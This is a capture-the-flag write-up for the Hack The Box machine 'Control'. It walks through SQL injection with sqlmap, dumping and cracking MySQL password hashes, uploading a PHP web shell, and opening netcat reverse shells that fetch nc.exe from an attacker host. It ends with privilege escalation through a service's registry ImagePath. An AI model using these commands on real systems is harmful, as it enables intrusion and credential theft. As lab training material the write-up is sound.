Control HTB

Hello fellow hackers,

This is the writeup for Control box.

As Always I did a port scan with the famous nmap and got 3 ports open.

80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql?
| fingerprint-strings: 
|   NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SMBProgNeg, TLSSessionReq, TerminalServerCookie, X11Probe, afp, giop: 
|_    Host '' is not allowed to connect to this MariaDB server

Port 80


I can tell from now this uses php(index.php). Inside the source code I see a comment

  <!-- To Do:
			- Import Products
			- Link to new payment system
			- Enable SSL (Certificates location \\\myfiles)
<!-- Header -->

After poking the website I see that admin.php is not accessible. Because it requires us to go through a proxy.


Searching about headers I found out that header X-Forwarded-For is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy

So I open burp suite and intercept the request to and add the IP address found in the index.php html code.


Now I add into burp suite math and replace the X-Forwarded-For, so burp can add that automatically to us.


Inside the admin app I can add, search, update, create products. I send each request on burp and try to find any vuln on the send parameters. I found out that search products is vulnerable to sql injection. After trying a sleep command. My request took long to respond back.


I copy the request to a file and then update the parameter to be productName=* . And then give it to sqlmap to extract info for us.

First I get all the databases with sqlmap -r sqlinjection.req --dbs --batch

[*] information_schema
[*] mysql
[*] warehouse

After get all mysql tables with sqlmap -r sqlinjection -D mysql --tables --batch

Database: mysql
[31 tables]
| db                        |
| event                     |
| user                      |
| column_stats              |
| columns_priv              |
| func                      |
| general_log               |
| global_priv               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |

After get the content of user row sqlmap -r sqlinjection.req -D mysql -T user --dump

root: 0A4A5CAD344718DC418035A1F4D292BA603134D8
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9D

Add the hashes inside a file and then crack them hashcat -m 300 crackme.txt rockyou.txt

root: 0A4A5CAD344718DC418035A1F4D292BA603134D8 
manager: CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA * l3tm3!n
hector : 0E178792E8FC304A2E3133D535D38CAF1DA3CD9D l33th4x0rhector

Let’s see again if we can upload a shell to the webserver and then access the server. To do this first I check which users is managing the mysql database. sqlmap -r sqlinjection.req --current-user --batch

current user: 'manager@localhost'

And then check the privileges of that user. sqlmap -r sqlinjection.req --privileges --batch

[*] 'manager'@'localhost' [1]:
    privilege: FILE     

which means we can indeed upload a file into the webserver. I create a file and add a simple php command to execute everything I give into the fuxsocy parameter.

<?php echo system($_GET['fuxsocy']); ?>

To upload a file I use sqlmap -r sqlinjection.req --file-write=q.php --file-dest=/inetpub/wwwroot/q.php --batch

I had to guess for the destination by trying possible directories found here

Then I visit the webpage and download nc.exe from my box and execute it to get a reverse shell. 10.10.X.X/nc.exe > C:\Windows\Temp\nc.exe (add a webserver first with python3 -m http.server 80)\Windows\Temp\nc.exe 10.10.X.X 9999 -e powershell.exe 
kali@kali:~$ rlwrap nc -nvlp 9999
listening on [any] 9999 ...
connect to [] from (UNKNOWN) [] 50431
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\wwwroot> whoami
nt authority\iusr
PS C:\inetpub\wwwroot>

Because I have the password for user hector I created a script to impersonate that user and then download the nc.exe and after get a shell back as that user.

$pass = ConvertTo-SecureString "l33th4x0rhector" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Fidelity\\hector", $pass)
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {curl http://10.10.X.X/nc.exe -O C:\Users\hector\Desktop\nc.exe}
Invoke-Command -ComputerName Fidelity -Credential $cred -ScriptBlock {C:\Users\hector\Desktop\nc.exe 10.10.X.X 8888 -e powershell}


User obtained.

The root part has to do with windows registry. To spot that we had to look into the users powershell history.

PS C:\Users\Hector\Documents> (Get-PSReadLineOption).HistorySavePath
PS C:\Users\Hector\Documents> type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
PS C:\Users\Hector\Documents>

Running get-acl HKLM:\SYSTEM\CurrentControlSet\services* | format-list

Path   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Access : CREATOR OWNER Allow  FullControl
         NT AUTHORITY\Authenticated Users Allow  ReadKey
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         CONTROL\Hector Allow  FullControl <--- USER HERE HAS FULLCONTROL
Audit  : 
Sddl   : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KA;;;S-1-5-21-3271572904-80546332

This means we can edit registries for a service and then execute malicious code which in our case is a reverse shell as administrator. First let’s see the services what hector has access to by issuing this command. Get-acl HKLM:\System\CurrentControlSet\Services\* | Format-List * | findstr /i "Hector Users Path" This gives us a big list with the proccess name. We would choose wuauserv.

PS C:\Users\Hector\Documents> Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv
Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\wuauserv

    Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Name                           Property                                                                                
----                           --------                                                                                
wuauserv                       DependOnService     : {rpcss}                                                           
                               Description         : @%systemroot%\system32\wuaueng.dll,-106                           
                               DisplayName         : @%systemroot%\system32\wuaueng.dll,-105                           
                               ErrorControl        : 1                                                                 
                               FailureActions      : {128, 81, 1, 0...}                                                
                               ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p                     
                               ObjectName          : LocalSystem                                                       
                               RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege,                       
                               SeCreatePageFilePrivilege, SeTcbPrivilege...}                                           
                               ServiceSidType      : 1                                                                 
                               Start               : 3                                                                 
                               SvcMemHardLimitInMB : 246                                                               
                               SvcMemMidLimitInMB  : 167                                                               
                               SvcMemSoftLimitInMB : 88                                                                
                               Type                : 32                                                                

PS C:\Users\Hector\Documents> 

I am using the wuauserv service as this service is the service windows use to check if an update is available and then stops so this should have a good chance to be inactive.

Let’s edit the ImagePath


setup listener and download nc then start the service.


The quieter you become, the more you are able to hear.